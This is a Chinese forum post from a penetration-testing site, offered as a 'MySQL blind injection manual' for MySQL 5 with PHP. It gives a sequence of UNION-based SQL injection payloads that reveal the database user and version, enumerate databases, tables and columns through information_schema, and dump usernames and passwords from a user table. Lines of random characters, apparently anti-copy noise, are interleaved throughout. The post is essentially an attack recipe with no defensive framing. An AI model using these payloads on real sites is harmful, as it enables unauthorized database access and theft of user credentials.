中国网络渗透测试联盟
标题:
mysql盲注手册
[打印本页]
作者:
admin
时间:
2012-9-13 16:27
标题:
mysql盲注手册
% T! ]$ Q6 ?* d' u
教程内容:Mysql 5+php 注入
4 y. m8 y, M* a5 @+ }) ~, a
/ t0 u7 [* t; p. @# R
$ t r9 | }! d1 V2 v
) Q% {2 f; y; C' I# ?6 z
一.查看MYSQL基本信息(库名,版本,用户)
/ A/ F* x; K/ X1 e) R
9 h0 Y: K7 ~9 l0 c, e3 D7 w9 ~5 T
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
) f+ m( \& \% {
% P9 h# Z! |/ E1 f( ~- }
二.查数据库
+ X% w2 K; @+ p. L1 V2 G
3 `$ {7 L; l1 Y* w1 {, B9 y
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
( P5 N6 U. J& E$ @
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
% J2 D$ V Z1 I' L! N" o/ h# }+ N5 r
6 w0 _3 {# i3 ?, q/ e3 ]! }" X
三.暴表
) G8 @% W7 ]- i- ~9 \: f
2 }+ J0 _+ \8 X+ b/ s! K
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
* P. J# Y& Q" Z3 N7 z
3 M' f$ { B% Q& I: ^ J
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
; t9 |8 t' E# X$ ~. j
' a# w1 G$ @/ n8 b8 z
四.暴字段
' X6 k3 I* q2 U) V
* [7 Z' |* K- f( ^" Z8 m
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
/ M/ |0 [4 Y4 y( J
% c- e2 p* y) V$ C' h
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
* _+ E4 o& j5 N2 M& m* j5 p- E* l
, @2 G9 {2 L( }7 C
五.暴数据
# Z8 D" Y) } A3 `7 R
6 M7 L* B) u" b, B
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
' v4 K4 U+ g7 z' d0 b+ l2 T
3 z, r: o6 \' x: v9 Q
1 y& `* Z+ Q, E
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
2 N- B5 V8 |6 E) h- M
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2